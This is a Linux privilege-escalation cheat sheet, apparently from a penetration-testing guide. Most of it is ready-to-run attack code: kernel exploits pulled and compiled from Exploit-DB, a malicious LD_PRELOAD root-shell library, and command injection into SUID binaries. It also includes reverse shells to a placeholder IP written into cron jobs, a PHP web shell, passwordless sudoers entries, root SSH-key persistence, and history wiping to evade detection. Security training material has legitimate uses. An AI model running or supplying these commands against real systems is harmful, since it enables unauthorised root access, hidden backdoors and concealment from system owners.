Linux Privilege Escalation: Going Up!¶
Privilege escalation on a Linux system is about exploiting specific vulnerabilities, misconfigurations, or oversights to gain elevated access — typically root. Even on a hardened system, subtle weaknesses like improperly configured SUID/SGID binaries, world-writable files, or unpatched kernel exploits can provide an attacker with a path to escalate privileges. The process involves thorough enumeration to uncover these opportunities, followed by precise exploitation, whether through command injection, leveraging environment variables, or exploiting vulnerable binaries. Mastery of these techniques allows you to move from basic user access to full system control, a crucial step in both offensive security and system hardening.
1. Initial Enumeration¶
System Info¶
uname -a
3.10.0-327, search for related exploits using searchsploit.
searchsploit 3.10.0-327
searchsploit -m linux/local/40616.c
gcc -pthread 40616.c -o dirtyc0w
./dirtyc0w
Kernel Version¶
uname -r
uname -r shows a kernel version with a known local exploit, search for it using searchsploit:
searchsploit <kernel_version>
2.6.32-431, search for relevant exploits.
searchsploit 2.6.32-431
searchsploit -m linux/local/15285.c
gcc 15285.c -o exploit
./exploit
User & Group Info¶
id
docker or lxd, search for container escape techniques.
For Docker:
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
whoami
sudo su
cat /etc/passwd
su <username>
2. Environment Enumeration¶
Environment Variables¶
env
LD_PRELOAD or PATH manipulated, create a malicious shared library to exploit LD_PRELOAD:
Create a malicious shared library:
// malicious.c
void _init() {
setgid(0);
setuid(0);
system("/bin/sh");
}
gcc -shared -o /tmp/malicious.so -fPIC malicious.c
export LD_PRELOAD=/tmp/malicious.so
SUID Binaries¶
find / -perm -4000 -type f 2>/dev/null
/usr/local/bin/backup with the SUID bit set. This binary was intended to perform backups, but it was poorly coded and does not sanitize input properly. It allows you to append additional commands to its execution.
If the backup binary accepts a file name as an argument and directly passes it to a system call like system() or exec(), you can inject commands by adding a semicolon and your desired command.
/usr/local/bin/backup "; /bin/bash -p"
Here, the -p flag preserves the SUID privileges, allowing you to spawn a root shell. This command executes the backup binary, but the semicolon allows you to terminate the expected command and start a new one, effectively giving you a shell with elevated privileges.
SGID Binaries¶
find / -perm -2000 -type f 2>/dev/null
/usr/local/bin/logsync with the SGID bit set to a privileged group, such as adm (which often has access to system logs). This script is intended to sync log files, but it doesn't properly handle user input and directly passes arguments to a command within the script.
If the script allows you to pass arguments, you could inject a command by manipulating the input. For example.
/usr/local/bin/logsync "/var/log/syslog; /bin/bash"
In this scenario, the script tries to sync /var/log/syslog, but the semicolon terminates the logsync command and then opens a new shell (/bin/bash). The shell inherits the group privileges (e.g., adm), allowing you to read or modify logs that require elevated privileges.
Processes¶
ps aux
Check if you can manipulate the files or intercept the process for privilege escalation.
echo "your code" > /path/to/target/file
Scheduled Tasks¶
crontab -l
/tmp, replace the script with your own:
Replace the script with a reverse shell.
echo "/bin/bash -i >& /dev/tcp/your_ip/your_port 0>&1" > /tmp/root_script.sh
cat /etc/crontab
/etc/crontab is writable by your user, modify it to run a malicious command:
Add a reverse shell to crontab.
echo "* * * * * root /bin/bash -i >& /dev/tcp/your_ip/your_port 0>&1" >> /etc/crontab
Network Info¶
netstat -tuln
vsftpd 2.3.4, search for an exploit using searchsploit:
searchsploit vsftpd 2.3.4
msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOST <target_ip>; run"
iptables -L
Probe the network for other accessible services to exploit further:
nmap -sT -p- <target_ip>
3. File & Directory Permissions¶
World-Writable Files & Directories¶
find / -writable -type d 2>/dev/null
/var/www/html on a web server, you could place a malicious script there if the web server runs with elevated privileges.
Place a malicious PHP script in the web directory to execute a shell.
echo '<?php system($_GET["cmd"]); ?>' > /var/www/html/shell.php
Interesting Files¶
ls -la /etc/sudoers
/etc/sudoers file or a file within /etc/sudoers.d/ is writable, you could escalate privileges by modifying it to grant yourself sudo access without a password:
Add a rule to allow your user to execute any command as root without a password:
echo "yourusername ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers.d/custom
sudo su
find / -type f -name ".sh" -perm -o+w 2>/dev/null
Append a reverse shell command to the writable script.
echo "/bin/bash -i >& /dev/tcp/your_ip/your_port 0>&1" >> /path/to/writable_script.sh
4. Review Installed Software¶
Package Lists¶
dpkg -l
searchsploit:
searchsploit <package_name>
searchsploit -m <exploit_id>.c
gcc <exploit_id>.c -o exploit
./exploit
rpm -qa
Script for automating dpkg -l output to run through searchsploit
#!/bin/bash
dpkg -l | awk '{print $2 " " $3}' | while read line; do
pkg=$(echo $line | awk '{print $1}')
ver=$(echo $line | awk '{print $2}')
echo "[*] Searching for exploits for $pkg version $ver..."
searchsploit "$pkg $ver"
done
Similar to dpkg -l, if you find an outdated or vulnerable package:
Search for an exploit:
searchsploit <package_name>
5. Exploit Enumeration¶
Search for Exploits¶
If your enumeration reveals a vulnerable kernel, software, or SUID binary, search for an exploit using searchsploit or online resources:
searchsploit <vulnerability_name_or_version>
searchsploit -m <exploit_id>.c
gcc <exploit_id>.c -o exploit
./exploit
Searchsploit is a go-to tool for finding and exploiting known vulnerabilities.
Automated Tools¶
./linpeas.sh
LinPEAS finds an interesting SUID binary, like /usr/bin/ab with insecure permissions, check GTFOBins or searchsploit for how to exploit it:
Search for an exploit method.
# Search for "ab" on GTFOBins
/usr/bin/ab -c "id > /tmp/output"
This example is less common, but valid if you encounter a lesser-known or uncommon SUID binary.
6. Attempt Privilege Escalation¶
Exploit Vulnerabilities¶
If you’ve identified a vulnerability through previous steps, now is the time to exploit it.
Search for the specific exploit using searchsploit or Exploit-DB
searchsploit <vulnerability>
./exploit
Test SUID/SGID Binaries¶
Suppose the result of running the SUID permissions search provided us with an uncommon binary like below:
find / -perm -4000 -type f 2>/dev/null
Output
```output
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/passwd
/usr/bin/simplecopy
```
Next step would be to run strings on that puppy to see what sort of calls it might have it in it that would run with higher privileges:
strings /usr/bin/simplecopy
Output
```
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
exit
__stack_chk_fail
system
__cxa_finalize
setgid
__libc_start_main
snprintf
GLIBC_2.2.5
GLIBC_2.4
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u+UH
[]A\A]A^A_
Usage: %s <source> <destination>
cp %s %s
```
In this instance cp is available to us and we provide the source and destination. Next, let's see if they protected it from tacking on commands:
/usr/bin/simplecopy HELP '/HELP && echo "chacho ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers && ls /root'
Excellent, now we can simply drop ourselves into a root shell:
sudo -i
Abuse Misconfigured Cron Jobs¶
If you discovered a cron job executing a script from a writable location, replace it with a malicious script:
Add a reverse shell.
echo "/bin/bash -i >& /dev/tcp/your_ip/your_port 0>&1" > /tmp/root_job.sh
7. Post-Exploitation¶
Confirm Privilege Escalation¶
id
id shows you as UID=0(root), you've successfully escalated privileges.
This is a realistic verification step after successful privilege escalation.
whoami
Persistence¶
Once you have root, you may want to maintain access:
Add your SSH key to the root account:
echo "your_ssh_public_key" >> /root/.ssh/authorized_keys
8. Clean Up¶
Remove Artifacts¶
After achieving your goals, delete any traces of your activities to avoid detection:
Remove scripts, binaries, or log entries related to your actions.
rm -f /tmp/exploit /tmp/root_job.sh /tmp/malicious.so
history -c